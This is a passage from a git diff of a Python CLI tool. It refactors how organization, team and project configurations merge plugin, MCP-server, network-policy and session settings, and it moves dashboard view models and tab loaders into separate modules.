allowed to add plugins", + requested_by=RequestSource.PROJECT, + reason=delegation_reason, ) ) continue @@ -498,7 +528,7 @@ def compute_effective_config( result.denied_additions.append( DelegationDenied( item=plugin, - requested_by=RequestSource.TEAM, + requested_by=RequestSource.PROJECT, reason="Plugin not allowed by defaults.allowed_plugins", ) ) @@ -509,15 +539,13 @@ def compute_effective_config( ConfigDecision( field="plugins", value=plugin, - reason=f"Added by team profile '{team_name}'", - source=f"team.{team_name}", + reason="Added by project config", + source="project", ) ) - team_mcp_servers = team_config.get("additional_mcp_servers", []) - team_delegated_mcp = is_team_delegated_for_mcp(org_config, team_name) - - for server_dict in team_mcp_servers: + project_mcp_servers = project_config.get("additional_mcp_servers", []) + for server_dict in project_mcp_servers: server_name = server_dict.get("name", "") server_url = server_dict.get("url", "") @@ -534,12 +562,12 @@ def compute_effective_config( ) continue - if not team_delegated_mcp: + if not project_delegated: result.denied_additions.append( DelegationDenied( item=server_name, - requested_by=RequestSource.TEAM, - reason=f"Team '{team_name}' not allowed to add MCP servers", + requested_by=RequestSource.PROJECT, + reason=delegation_reason, target_type=TargetType.MCP_SERVER, ) ) @@ -549,18 +577,20 @@ def compute_effective_config( result.denied_additions.append( DelegationDenied( item=server_name or server_url, - requested_by=RequestSource.TEAM, + requested_by=RequestSource.PROJECT, reason="MCP server not allowed by defaults.allowed_mcp_servers", target_type=TargetType.MCP_SERVER, ) ) continue - if result.network_policy == NetworkPolicy.ISOLATED.value and is_network_mcp(server_dict): + if result.network_policy == NetworkPolicy.LOCKED_DOWN_WEB.value and is_network_mcp( + server_dict + ): result.blocked_items.append( BlockedItem( item=server_name or server_url, - blocked_by="network_policy=isolated", + blocked_by="network_policy=locked-down-web", source=network_policy_source or "org.defaults", target_type=TargetType.MCP_SERVER, ) @@ -594,182 +624,229 @@ def compute_effective_config( ConfigDecision( field="mcp_servers", value=server_name, - reason=f"Added by team profile '{team_name}'", - source=f"team.{team_name}", + reason="Added by project config", + source="project", ) ) - team_session = team_config.get("session", {}) - if team_session.get("timeout_hours") is not None: - result.session_config.timeout_hours = team_session["timeout_hours"] + project_session = project_config.get("session", {}) + if project_session.get("timeout_hours") is not None: + if project_delegated: + result.session_config.timeout_hours = project_session["timeout_hours"] + result.decisions.append( + ConfigDecision( + field="session.timeout_hours", + value=project_session["timeout_hours"], + reason="Overridden by project config", + source="project", + ) + ) + if project_session.get("auto_resume") is not None: + if project_delegated: + result.session_config.auto_resume = project_session["auto_resume"] + result.decisions.append( + ConfigDecision( + field="session.auto_resume", + value=project_session["auto_resume"], + reason="Overridden by project config", + source="project", + ) + ) + + +def compute_effective_config( + org_config: dict[str, Any] | NormalizedOrgConfig, + team_name: str | None, + project_config: dict[str, Any] | None = None, + workspace_path: str | Path | None = None, +) -> EffectiveConfig: + """Compute effective configuration by merging org defaults → team → project.""" + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) + + if workspace_path is not None: + project_config = config_module.read_project_config(workspace_path) + + result = EffectiveConfig() + + blocked_plugins = list(org_config.security.blocked_plugins) + blocked_mcp_servers = list(org_config.security.blocked_mcp_servers) + + default_plugins = list(org_config.defaults.enabled_plugins) + disabled_plugins = list(org_config.defaults.disabled_plugins) + allowed_plugins: list[str] | None = ( + list(org_config.defaults.allowed_plugins) + if org_config.defaults.allowed_plugins is not None + else None + ) + allowed_mcp_servers: list[str] | None = ( + list(org_config.defaults.allowed_mcp_servers) + if org_config.defaults.allowed_mcp_servers is not None + else None + ) + default_network_policy = org_config.defaults.network_policy + default_session = org_config.defaults.session + + for plugin in default_plugins: + blocked_by = matches_blocked_plugin(plugin, blocked_plugins) + if blocked_by: + result.blocked_items.append( + BlockedItem(item=plugin, blocked_by=blocked_by, source="org.security") + ) + continue + + if matches_blocked_plugin(plugin, disabled_plugins): + continue + + result.plugins.add(plugin) + result.decisions.append( + ConfigDecision( + field="plugins", + value=plugin, + reason="Included in organization defaults", + source="org.defaults", + ) + ) + + network_policy_source: str | None = None + if default_network_policy: + result.network_policy = default_network_policy + network_policy_source = "org.defaults" + record_network_policy_decision( + result, + policy=default_network_policy, + reason="Organization default network policy", + source="org.defaults", + ) + + if default_session.timeout_hours is not None: + result.session_config.timeout_hours = default_session.timeout_hours result.decisions.append( ConfigDecision( field="session.timeout_hours", - value=team_session["timeout_hours"], - reason=f"Overridden by team profile '{team_name}'", - source=f"team.{team_name}", + value=default_session.timeout_hours, + reason="Organization default session timeout", + source="org.defaults", ) ) - if team_session.get("auto_resume") is not None: - result.session_config.auto_resume = team_session["auto_resume"] + if default_session.auto_resume is not None: + result.session_config.auto_resume = default_session.auto_resume result.decisions.append( ConfigDecision( field="session.auto_resume", - value=team_session["auto_resume"], - reason=f"Overridden by team profile '{team_name}'", - source=f"team.{team_name}", + value=default_session.auto_resume, + reason="Organization default session auto-resume", + source="org.defaults", ) ) - if project_config: - project_delegated, delegation_reason = is_project_delegated(org_config, team_name) + team_config = org_config.profiles.get(team_name) if team_name else None - project_plugins = project_config.get("additional_plugins", []) - for plugin in project_plugins: - blocked_by = matches_blocked_plugin(plugin, blocked_plugins) - if blocked_by: - result.blocked_items.append( - BlockedItem(item=plugin, blocked_by=blocked_by, source="org.security") - ) - continue - - if not project_delegated: - result.denied_additions.append( - DelegationDenied( - item=plugin, - requested_by=RequestSource.PROJECT, - reason=delegation_reason, - ) - ) - continue - - if not is_plugin_allowed(plugin, allowed_plugins): - result.denied_additions.append( - DelegationDenied( - item=plugin, - requested_by=RequestSource.PROJECT, - reason="Plugin not allowed by defaults.allowed_plugins", - ) - ) - continue - - result.plugins.add(plugin) - result.decisions.append( - ConfigDecision( - field="plugins", - value=plugin, - reason="Added by project config", - source="project", - ) + team_network_policy = team_config.network_policy if team_config else None + if team_network_policy: + if result.network_policy is None: + result.network_policy = team_network_policy + network_policy_source = f"team.{team_name}" + record_network_policy_decision( + result, + policy=team_network_policy, + reason=f"Overridden by team profile '{team_name}'", + source=f"team.{team_name}", + ) + elif is_more_or_equal_restrictive(team_network_policy, result.network_policy): + result.network_policy = team_network_policy + network_policy_source = f"team.{team_name}" + record_network_policy_decision( + result, + policy=team_network_policy, + reason=f"Overridden by team profile '{team_name}'", + source=f"team.{team_name}", ) - project_mcp_servers = project_config.get("additional_mcp_servers", []) - for server_dict in project_mcp_servers: - server_name = server_dict.get("name", "") - server_url = server_dict.get("url", "") + team_plugins = list(team_config.additional_plugins) if team_config else [] + team_delegated_plugins = is_team_delegated_for_plugins(org_config, team_name) - blocked_by = match_blocked_mcp(server_dict, blocked_mcp_servers) + for plugin in team_plugins: + blocked_by = matches_blocked_plugin(plugin, blocked_plugins) + if blocked_by: + result.blocked_items.append( + BlockedItem(item=plugin, blocked_by=blocked_by, source="org.security") + ) + continue - if blocked_by: - result.blocked_items.append( - BlockedItem( - item=server_name or server_url, - blocked_by=blocked_by, - source="org.security", - target_type=TargetType.MCP_SERVER, - ) + if not team_delegated_plugins: + result.denied_additions.append( + DelegationDenied( + item=plugin, + requested_by=RequestSource.TEAM, + reason=f"Team '{team_name}' not allowed to add plugins", ) - continue + ) + continue - if not project_delegated: - result.denied_additions.append( - DelegationDenied( - item=server_name, - requested_by=RequestSource.PROJECT, - reason=delegation_reason, - target_type=TargetType.MCP_SERVER, - ) + if not is_plugin_allowed(plugin, allowed_plugins): + result.denied_additions.append( + DelegationDenied( + item=plugin, + requested_by=RequestSource.TEAM, + reason="Plugin not allowed by defaults.allowed_plugins", ) - continue + ) + continue - if not is_mcp_allowed(server_dict, allowed_mcp_servers): - result.denied_additions.append( - DelegationDenied( - item=server_name or server_url, - requested_by=RequestSource.PROJECT, - reason="MCP server not allowed by defaults.allowed_mcp_servers", - target_type=TargetType.MCP_SERVER, - ) - ) - continue + result.plugins.add(plugin) + result.decisions.append( + ConfigDecision( + field="plugins", + value=plugin, + reason=f"Added by team profile '{team_name}'", + source=f"team.{team_name}", + ) + ) - if result.network_policy == NetworkPolicy.ISOLATED.value and is_network_mcp( - server_dict - ): - result.blocked_items.append( - BlockedItem( - item=server_name or server_url, - blocked_by="network_policy=isolated", - source=network_policy_source or "org.defaults", - target_type=TargetType.MCP_SERVER, - ) - ) - continue + _merge_team_mcp_servers( + result, + team_config=team_config, + team_name=team_name, + org_config=org_config, + blocked_mcp_servers=blocked_mcp_servers, + allowed_mcp_servers=allowed_mcp_servers, + network_policy_source=network_policy_source, + ) - if server_dict.get("type") == MCPServerType.STDIO: - stdio_result = validate_stdio_server(server_dict, org_config) - if stdio_result.blocked: - result.blocked_items.append( - BlockedItem( - item=server_name, - blocked_by=stdio_result.reason, - source="org.security", - target_type=TargetType.MCP_SERVER, - ) - ) - continue - - mcp_server = MCPServer( - name=server_name, - type=server_dict.get("type", MCPServerType.SSE), - url=server_url or None, - command=server_dict.get("command"), - args=server_dict.get("args"), - env=server_dict.get("env"), - headers=server_dict.get("headers"), + team_session = team_config.session if team_config else SessionSettings() + if team_session.timeout_hours is not None: + result.session_config.timeout_hours = team_session.timeout_hours + result.decisions.append( + ConfigDecision( + field="session.timeout_hours", + value=team_session.timeout_hours, + reason=f"Overridden by team profile '{team_name}'", + source=f"team.{team_name}", ) - result.mcp_servers.append(mcp_server) - result.decisions.append( - ConfigDecision( - field="mcp_servers", - value=server_name, - reason="Added by project config", - source="project", - ) + ) + if team_session.auto_resume is not None: + result.session_config.auto_resume = team_session.auto_resume + result.decisions.append( + ConfigDecision( + field="session.auto_resume", + value=team_session.auto_resume, + reason=f"Overridden by team profile '{team_name}'", + source=f"team.{team_name}", ) + ) - project_session = project_config.get("session", {}) - if project_session.get("timeout_hours") is not None: - if project_delegated: - result.session_config.timeout_hours = project_session["timeout_hours"] - result.decisions.append( - ConfigDecision( - field="session.timeout_hours", - value=project_session["timeout_hours"], - reason="Overridden by project config", - source="project", - ) - ) - if project_session.get("auto_resume") is not None: - if project_delegated: - result.session_config.auto_resume = project_session["auto_resume"] - result.decisions.append( - ConfigDecision( - field="session.auto_resume", - value=project_session["auto_resume"], - reason="Overridden by project config", - source="project", - ) - ) + if project_config: + _merge_project_config( + result, + project_config=project_config, + org_config=org_config, + team_name=team_name, + blocked_plugins=blocked_plugins, + blocked_mcp_servers=blocked_mcp_servers, + allowed_plugins=allowed_plugins, + allowed_mcp_servers=allowed_mcp_servers, + network_policy_source=network_policy_source, + ) return result diff --git a/src/scc_cli/application/dashboard.py b/src/scc_cli/application/dashboard.py index 65e8cde..ceb4c0b 100644 --- a/src/scc_cli/application/dashboard.py +++ b/src/scc_cli/application/dashboard.py @@ -1,380 +1,122 @@ -"""Dashboard view models and flow orchestration.""" - -from __future__ import annotations - -from collections.abc import Callable, Mapping, Sequence -from dataclasses import dataclass, replace -from datetime import datetime -from enum import Enum, auto -from typing import TypeAlias - -from scc_cli.application.sessions import SessionService -from scc_cli.docker.core import ContainerInfo -from scc_cli.ports.session_models import SessionFilter, SessionSummary -from scc_cli.services.git.worktree import WorktreeInfo - - -class DashboardTab(Enum): - """Available dashboard tabs.""" - - STATUS = auto() - CONTAINERS = auto() - SESSIONS = auto() - WORKTREES = auto() - - @property - def display_name(self) -> str: - """Human-readable name for display in chrome.""" - names = { - DashboardTab.STATUS: "Status", - DashboardTab.CONTAINERS: "Containers", - DashboardTab.SESSIONS: "Sessions", - DashboardTab.WORKTREES: "Worktrees", - } - return names[self] - - -TAB_ORDER: tuple[DashboardTab, ...] = ( - DashboardTab.STATUS, - DashboardTab.CONTAINERS, - DashboardTab.SESSIONS, - DashboardTab.WORKTREES, -) - - -class StatusAction(Enum): - """Supported actions for status tab items.""" - - START_SESSION = auto() - RESUME_SESSION = auto() - SWITCH_TEAM = auto() - OPEN_TAB = auto() - INSTALL_STATUSLINE = auto() - OPEN_PROFILE = auto() - OPEN_SETTINGS = auto() - - -class PlaceholderKind(Enum): - """Placeholder rows for empty or error states.""" - - NO_CONTAINERS = auto() - NO_SESSIONS = auto() - NO_WORKTREES = auto() - NO_GIT = auto() - ERROR = auto() - CONFIG_ERROR = auto() - - -@dataclass(frozen=True) -class StatusItem: - """Status tab row with optional action metadata.""" - - label: str - description: str - action: StatusAction | None = None - action_tab: DashboardTab | None = None - session: SessionSummary | None = None - - -@dataclass(frozen=True) -class PlaceholderItem: - """Placeholder row for empty/error states.""" - - label: str - description: str - kind: PlaceholderKind - startable: bool = False - - -@dataclass(frozen=True) -class ContainerItem: - """Container row backed by Docker metadata.""" - - label: str - description: str - container: ContainerInfo - - -@dataclass(frozen=True) -class SessionItem: - """Session row backed by session metadata.""" - - label: str - description: str - session: SessionSummary - - -@dataclass(frozen=True) -class WorktreeItem: - """Worktree row backed by git worktree data.""" - - label: str - description: str - path: str - - -DashboardItem: TypeAlias = StatusItem | PlaceholderItem | ContainerItem | SessionItem | WorktreeItem - - -@dataclass(frozen=True) -class DashboardTabData: - """View model for a single dashboard tab.""" - - tab: DashboardTab - title: str - items: Sequence[DashboardItem] - count_active: int - count_total: int - - @property - def subtitle(self) -> str: - """Generate subtitle from counts.""" - if self.count_active == self.count_total: - return f"{self.count_total} total" - return f"{self.count_active} active, {self.count_total} total" - - -@dataclass(frozen=True) -class DashboardViewModel: - """View model for a full dashboard render.""" - - active_tab: DashboardTab - tabs: Mapping[DashboardTab, DashboardTabData] - status_message: str | None - verbose_worktrees: bool - - -@dataclass(frozen=True) -class DashboardFlowState: - """Flow state preserved between dashboard runs.""" - - restore_tab: DashboardTab | None = None - toast_message: str | None = None - verbose_worktrees: bool = False - - -class StartFlowDecision(Enum): - """Decision outcomes from the start flow.""" - - LAUNCHED = auto() - CANCELLED = auto() - QUIT = auto() - - -@dataclass(frozen=True) -class StartFlowResult: - """Result from executing the start flow.""" - - decision: StartFlowDecision - - @classmethod - def from_legacy(cls, result: bool | None) -> StartFlowResult: - """Convert legacy bool/None start result into a structured outcome.""" - if result is None: - return cls(decision=StartFlowDecision.QUIT) - if result is True: - return cls(decision=StartFlowDecision.LAUNCHED) - return cls(decision=StartFlowDecision.CANCELLED) - - -@dataclass(frozen=True) -class TeamSwitchEvent: - """Event for switching teams.""" - - -@dataclass(frozen=True) -class StartFlowEvent: - """Event for starting a new session flow.""" - - return_to: DashboardTab - reason: str - - -@dataclass(frozen=True) -class RefreshEvent: - """Event for refreshing dashboard data.""" - - return_to: DashboardTab - - -@dataclass(frozen=True) -class SessionResumeEvent: - """Event for resuming a session.""" - - return_to: DashboardTab - session: SessionSummary - - -@dataclass(frozen=True) -class StatuslineInstallEvent: - """Event for installing statusline.""" - - return_to: DashboardTab - - -@dataclass(frozen=True) -class RecentWorkspacesEvent: - """Event for picking a recent workspace.""" - - return_to: DashboardTab - - -@dataclass(frozen=True) -class GitInitEvent: - """Event for initializing git.""" - - return_to: DashboardTab - - -@dataclass(frozen=True) -class CreateWorktreeEvent: - """Event for creating a worktree or cloning.""" - - return_to: DashboardTab - is_git_repo: bool - - -@dataclass(frozen=True) -class VerboseToggleEvent: - """Event for toggling verbose worktree status.""" - - return_to: DashboardTab - verbose: bool - - -@dataclass(frozen=True) -class SettingsEvent: - """Event for opening settings.""" - - return_to: DashboardTab - - -@dataclass(frozen=True) -class ContainerStopEvent: - """Event for stopping a container.""" - - return_to: DashboardTab - container_id: str - container_name: str - - -@dataclass(frozen=True) -class ContainerResumeEvent: - """Event for resuming a container.""" - - return_to: DashboardTab - container_id: str - container_name: str - - -@dataclass(frozen=True) -class ContainerRemoveEvent: - """Event for removing a container.""" - - return_to: DashboardTab - container_id: str - container_name: str - - -@dataclass(frozen=True) -class ProfileMenuEvent: - """Event for opening the profile menu.""" - - return_to: DashboardTab - - -@dataclass(frozen=True) -class SandboxImportEvent: - """Event for importing sandbox plugins.""" - - return_to: DashboardTab +"""Dashboard view models and flow orchestration. +This module is the public API surface for dashboard types and logic. +Models are defined in dashboard_models, loaders in dashboard_loaders. +All public names are re-exported here to preserve backward compatibility. +""" -@dataclass(frozen=True) -class ContainerActionMenuEvent: - """Event for the container action menu.""" - - return_to: DashboardTab - container_id: str - container_name: str - - -@dataclass(frozen=True) -class SessionActionMenuEvent: - """Event for the session action menu.""" - - return_to: DashboardTab - session: SessionSummary - - -@dataclass(frozen=True) -class WorktreeActionMenuEvent: - """Event for the worktree action menu.""" - - return_to: DashboardTab - worktree_path: str +from __future__ import annotations +from dataclasses import replace -DashboardEvent: TypeAlias = ( - TeamSwitchEvent - | StartFlowEvent - | RefreshEvent - | SessionResumeEvent - | StatuslineInstallEvent - | RecentWorkspacesEvent - | GitInitEvent - | CreateWorktreeEvent - | VerboseToggleEvent - | SettingsEvent - | ContainerStopEvent - | ContainerResumeEvent - | ContainerRemoveEvent - | ProfileMenuEvent - | SandboxImportEvent - | ContainerActionMenuEvent - | SessionActionMenuEvent - | WorktreeActionMenuEvent +# Re-export all loaders from dashboard_loaders +from scc_cli.application.dashboard_loaders import ( + load_all_tab_data, + load_containers_tab_data, + load_sessions_tab_data, + load_status_tab_data, + load_worktrees_tab_data, ) -DashboardEffect: TypeAlias = ( - TeamSwitchEvent - | StartFlowEvent - | SessionResumeEvent - | StatuslineInstallEvent - | RecentWorkspacesEvent - | GitInitEvent - | CreateWorktreeEvent - | SettingsEvent - | ContainerStopEvent - | ContainerResumeEvent - | ContainerRemoveEvent - | ProfileMenuEvent - | SandboxImportEvent - | ContainerActionMenuEvent - | SessionActionMenuEvent - | WorktreeActionMenuEvent +# Re-export all models and types from dashboard_models +from scc_cli.application.dashboard_models import ( + TAB_ORDER, + ContainerActionMenuEvent, + ContainerItem, + ContainerRemoveEvent, + ContainerResumeEvent, + ContainerStopEvent, + ContainerSummary, + CreateWorktreeEvent, + DashboardDataLoader, + DashboardEffect, + DashboardEffectRequest, + DashboardEvent, + DashboardFlowOutcome, + DashboardFlowState, + DashboardItem, + DashboardNextStep, + DashboardTab, + DashboardTabData, + DashboardViewModel, + GitInitEvent, + PlaceholderItem, + PlaceholderKind, + ProfileMenuEvent, + RecentWorkspacesEvent, + RefreshEvent, + SandboxImportEvent, + SessionActionMenuEvent, + SessionItem, + SessionResumeEvent, + SettingsEvent, + StartFlowDecision, + StartFlowEvent, + StartFlowResult, + StatusAction, + StatusItem, + StatuslineInstallEvent, + TeamSwitchEvent, + VerboseToggleEvent, + WorktreeActionMenuEvent, + WorktreeItem, ) - -@dataclass(frozen=True) -class DashboardEffectRequest: - """Effect request emitted from a dashboard event.""" - - state: DashboardFlowState - effect: DashboardEffect - - -@dataclass(frozen=True) -class DashboardFlowOutcome: - """Outcome after handling an event or effect.""" - - state: DashboardFlowState - exit_dashboard: bool = False - - -DashboardNextStep: TypeAlias = DashboardEffectRequest | DashboardFlowOutcome - -DashboardDataLoader: TypeAlias = Callable[[bool], Mapping[DashboardTab, DashboardTabData]] +__all__ = [ + # Models and types + "ContainerActionMenuEvent", + "ContainerItem", + "ContainerRemoveEvent", + "ContainerResumeEvent", + "ContainerStopEvent", + "ContainerSummary", + "CreateWorktreeEvent", + "DashboardDataLoader", + "DashboardEffect", + "DashboardEffectRequest", + "DashboardEvent", + "DashboardFlowOutcome", + "DashboardFlowState", + "DashboardItem", + "DashboardNextStep", + "DashboardTab", + "DashboardTabData", + "DashboardViewModel", + "GitInitEvent", + "PlaceholderItem", + "PlaceholderKind", + "ProfileMenuEvent", + "RecentWorkspacesEvent", + "RefreshEvent", + "SandboxImportEvent", + "SessionActionMenuEvent", + "SessionItem", + "SessionResumeEvent", + "SettingsEvent", + "StartFlowDecision", + "StartFlowEvent", + "StartFlowResult", + "StatusAction", + "StatusItem", + "StatuslineInstallEvent", + "TAB_ORDER", + "TeamSwitchEvent", + "VerboseToggleEvent", + "WorktreeActionMenuEvent", + "WorktreeItem", + # Loaders + "load_all_tab_data", + "load_containers_tab_data", + "load_sessions_tab_data", + "load_status_tab_data", + "load_worktrees_tab_data", + # Functions + "apply_dashboard_effect_result", + "build_dashboard_view", + "handle_dashboard_event", + "placeholder_start_reason", + "placeholder_tip", +] def placeholder_tip(kind: PlaceholderKind) -> str: @@ -518,7 +260,7 @@ def apply_dashboard_effect_result( return DashboardFlowOutcome(state=state, exit_dashboard=True) if result.decision is StartFlowDecision.LAUNCHED: return DashboardFlowOutcome(state=state, exit_dashboard=True) - next_state = replace(state, toast_message="Start cancelled") + next_state = replace(state, toast_message=result.message or "Start cancelled") return DashboardFlowOutcome(state=next_state) if isinstance(effect, SessionResumeEvent): @@ -644,441 +386,3 @@ def _apply_container_message( fallback = success_message if success else failure_message next_state = replace(state, toast_message=message or fallback) return DashboardFlowOutcome(state=next_state) - - -def load_status_tab_data( - refresh_at: datetime | None = None, - *, - session_service: SessionService, - format_last_used: Callable[[str], str] | None = None, -) -> DashboardTabData: - """Load Status tab data showing quick actions and context.""" - import os - from pathlib import Path - - from scc_cli import config - from scc_cli.core.personal_profiles import get_profile_status - from scc_cli.docker import core as docker_core - - _ = refresh_at - - items: list[DashboardItem] = [] - - items.append( - StatusItem( - label="New session", - description="", - action=StatusAction.START_SESSION, - ) - ) - - try: - recent_result = session_service.list_recent(SessionFilter(limit=1, include_all=True)) - recent_session = recent_result.sessions[0] if recent_result.sessions else None - if recent_session: - workspace = recent_session.workspace - workspace_name = workspace.split("/")[-1] if workspace else "unknown" - last_used = recent_session.last_used - last_used_display = "" - if last_used: - last_used_display = format_last_used(last_used) if format_last_used else last_used - desc_parts = [workspace_name] - if recent_session.branch: - desc_parts.append(str(recent_session.branch)) - if last_used_display: - desc_parts.append(last_used_display) - items.append( - StatusItem( - label="Resume last", - description=" · ".join(desc_parts), - action=StatusAction.RESUME_SESSION, - session=recent_session, - ) - ) - except Exception: - pass - - try: - user_config = config.load_user_config() - team = user_config.get("selected_profile") - org_source = user_config.get("organization_source") - - if team: - items.append( - StatusItem( - label=f"Team: {team}", - description="", - action=StatusAction.SWITCH_TEAM, - ) - ) - else: - items.append( - StatusItem( - label="Team: none", - description="", - action=StatusAction.SWITCH_TEAM, - ) - ) - - try: - workspace_path = Path(os.getcwd()) - profile_status = get_profile_status(workspace_path) - - if profile_status.exists: - if profile_status.import_count > 0: - profile_label = f"Profile: saved · ↓ {profile_status.import_count} importable" - elif profile_status.has_drift: - profile_label = "Profile: saved · ◇ drifted" - else: - profile_label = "Profile: saved · ✓ synced" - items.append( - StatusItem( - label=profile_label, - description="", - action=StatusAction.OPEN_PROFILE, - ) - ) - else: - items.append( - StatusItem( - label="Profile: none", - description="", - action=StatusAction.OPEN_PROFILE, - ) - ) - except Exception: - pass - - if org_source and isinstance(org_source, dict): - org_url = org_source.get("url", "") - if org_url: - org_name = None - try: - org_config = config.load_cached_org_config() - if org_config: - org_name = org_config.get("organization", {}).get("name") - except Exception: - org_name = None - - if not org_name: - org_name = org_url.replace("https://", "").replace("http://", "").split("/")[0] - - items.append( - StatusItem( - label=f"Organization: {org_name}", - description="", - ) - ) - elif user_config.get("standalone"): - items.append( - StatusItem( - label="Mode: standalone", - description="", - ) - ) - - except Exception: - items.append( - StatusItem( - label="Config: error", - description="", - ) - ) - - try: - containers = docker_core.list_scc_containers() - running = sum(1 for container in containers if "Up" in container.status) - total = len(containers) - items.append( - StatusItem( - label=f"Containers: {running}/{total} running", - description="", - action=StatusAction.OPEN_TAB, - action_tab=DashboardTab.CONTAINERS, - ) - ) - except Exception: - pass - - items.append( - StatusItem( - label="Settings", - description="", - action=StatusAction.OPEN_SETTINGS, - ) - ) - - return DashboardTabData( - tab=DashboardTab.STATUS, - title="Status", - items=items, - count_active=len(items), - count_total=len(items), - ) - - -def load_containers_tab_data() -> DashboardTabData: - """Load Containers tab data showing SCC-managed containers.""" - from scc_cli.docker import core as docker_core - - items: list[DashboardItem] = [] - - try: - containers = docker_core.list_scc_containers() - running_count = 0 - - for container in containers: - is_running = "Up" in container.status if container.status else False - if is_running: - running_count += 1 - label = container.name - description = _format_container_description(container) - items.append(ContainerItem(label=label, description=description, container=container)) - - if not items: - items.append( - PlaceholderItem( - label="No containers", - description="Press 'n' to start or run `scc start `", - kind=PlaceholderKind.NO_CONTAINERS, - startable=True, - ) - ) - - return DashboardTabData( - tab=DashboardTab.CONTAINERS, - title="Containers", - items=items, - count_active=running_count, - count_total=len(containers), - ) - - except Exception: - return DashboardTabData( - tab=DashboardTab.CONTAINERS, - title="Containers", - items=[ - PlaceholderItem( - label="Error", - description="Unable to query Docker", - kind=PlaceholderKind.ERROR, - ) - ], - count_active=0, - count_total=0, - ) - - -def load_sessions_tab_data( - *, - session_service: SessionService, - format_last_used: Callable[[str], str] | None = None, -) -> DashboardTabData: - """Load Sessions tab data showing recent Claude sessions.""" - items: list[DashboardItem] = [] - - try: - recent_result = session_service.list_recent(SessionFilter(limit=20, include_all=True)) - recent = recent_result.sessions - - for session in recent: - desc_parts = [] - - if session.team: - desc_parts.append(str(session.team)) - if session.branch: - desc_parts.append(str(session.branch)) - if session.last_used: - desc_parts.append( - format_last_used(session.last_used) if format_last_used else session.last_used - ) - - items.append( - SessionItem( - label=session.name or "Unnamed", - description=" · ".join(desc_parts), - session=session, - ) - ) - - if not items: - items.append( - PlaceholderItem( - label="No sessions", - description="Press Enter to start", - kind=PlaceholderKind.NO_SESSIONS, - startable=True, - ) - ) - - return DashboardTabData( - tab=DashboardTab.SESSIONS, - title="Sessions", - items=items, - count_active=len(recent), - count_total=len(recent), - ) - - except Exception: - return DashboardTabData( - tab=DashboardTab.SESSIONS, - title="Sessions", - items=[ - PlaceholderItem( - label="Error", - description="Unable to load sessions", - kind=PlaceholderKind.ERROR, - ) - ], - count_active=0, - count_total=0, - ) - - -def load_worktrees_tab_data(verbose: bool = False) -> DashboardTabData: - """Load Worktrees tab data showing git worktrees.""" - import os - from pathlib import Path - - from scc_cli.services.git.worktree import get_worktree_status, get_worktrees_data - - items: list[DashboardItem] = [] - - try: - cwd = Path(os.getcwd()) - worktrees = get_worktrees_data(cwd) - current_path = os.path.realpath(cwd) - - for worktree in worktrees: - if os.path.realpath(worktree.path) == current_path: - worktree.is_current = True - - if verbose: - staged, modified, untracked, timed_out = get_worktree_status(worktree.path) - worktree.staged_count = staged - worktree.modified_count = modified - worktree.untracked_count = untracked - worktree.status_timed_out = timed_out - worktree.has_changes = (staged + modified + untracked) > 0 - - current_count = sum(1 for worktree in worktrees if worktree.is_current) - - for worktree in worktrees: - description = _format_worktree_description(worktree, verbose=verbose) - items.append( - WorktreeItem( - label=Path(worktree.path).name, - description=description, - path=worktree.path, - ) - ) - - if not items: - items.append( - PlaceholderItem( - label="No worktrees", - description="Press w for recent · i to init · c to clone", - kind=PlaceholderKind.NO_WORKTREES, - ) - ) - - return DashboardTabData( - tab=DashboardTab.WORKTREES, - title="Worktrees", - items=items, - count_active=current_count, - count_total=len(worktrees), - ) - - except Exception: - return DashboardTabData( - tab=DashboardTab.WORKTREES, - title="Worktrees", - items=[ - PlaceholderItem( - label="Not available", - description="Press w for recent · i to init · c to clone", - kind=PlaceholderKind.NO_GIT, - ) - ], - count_active=0, - count_total=0, - ) - - -def load_all_tab_data( - *, - session_service: SessionService, - format_last_used: Callable[[str], str] | None = None, - verbose_worktrees: bool = False, -) -> Mapping[DashboardTab, DashboardTabData]: - """Load data for all dashboard tabs.""" - return { - DashboardTab.STATUS: load_status_tab_data( - session_service=session_service, - format_last_used=format_last_used, - ), - DashboardTab.CONTAINERS: load_containers_tab_data(), - DashboardTab.SESSIONS: load_sessions_tab_data( - session_service=session_service, - format_last_used=format_last_used, - ), - DashboardTab.WORKTREES: load_worktrees_tab_data(verbose=verbose_worktrees), - } - - -def _format_container_description(container: ContainerInfo) -> str: - desc_parts: list[str] = [] - - if container.workspace: - workspace_name = container.workspace.split("/")[-1] - desc_parts.append(workspace_name) - - if container.status: - time_str = _extract_container_time(container.status) - if container.status.startswith("Up"): - desc_parts.append(f"● {time_str}") - else: - desc_parts.append("○ stopped") - - return " · ".join(desc_parts) - - -def _extract_container_time(status: str) -> str: - import re - - match = re.search(r"Up\s+(.+)", status) - if match: - return match.group(1) - return status - - -def _format_worktree_description(worktree: WorktreeInfo, *, verbose: bool) -> str: - from scc_cli import git - - desc_parts: list[str] = [] - if worktree.branch: - desc_parts.append(git.get_display_branch(worktree.branch)) - - if verbose: - if worktree.status_timed_out: - desc_parts.append("status timeout") - else: - status_parts = [] - if worktree.staged_count > 0: - status_parts.append(f"+{worktree.staged_count}") - if worktree.modified_count > 0: - status_parts.append(f"!{worktree.modified_count}") - if worktree.untracked_count > 0: - status_parts.append(f"?{worktree.untracked_count}") - if status_parts: - desc_parts.append(" ".join(status_parts)) - elif not worktree.has_changes: - desc_parts.append("clean") - elif worktree.has_changes: - desc_parts.append("modified") - - if worktree.is_current: - desc_parts.append("(current)") - - return " ".join(desc_parts) diff --git a/src/scc_cli/application/dashboard_loaders.py b/src/scc_cli/application/dashboard_loaders.py new file mode 100644 index 0000000..ac6c528 --- /dev/null +++ b/src/scc_cli/application/dashboard_loaders.py @@ -0,0 +1,481 @@ +"""Dashboard tab data loaders. + +Each loader fetches data from services/infrastructure and returns +application-layer view models. Container data is mapped to +ContainerSummary to avoid coupling to docker.core. +""" + +from __future__ import annotations + +from collections.abc import Callable, Mapping +from datetime import datetime + +from scc_cli.application.sessions import SessionService +from scc_cli.ports.session_models import SessionFilter +from scc_cli.services.git.worktree import WorktreeInfo + +from .dashboard_models import ( + ContainerItem, + ContainerSummary, + DashboardItem, + DashboardTab, + DashboardTabData, + PlaceholderItem, + PlaceholderKind, + SessionItem, + StatusAction, + StatusItem, + WorktreeItem, +) + + +def load_status_tab_data( + refresh_at: datetime | None = None, + *, + session_service: SessionService, + format_last_used: Callable[[str], str] | None = None, +) -> DashboardTabData: + """Load Status tab data showing quick actions and context.""" + import os + from pathlib import Path + + from scc_cli import config + from scc_cli.core.personal_profiles import get_profile_status + from 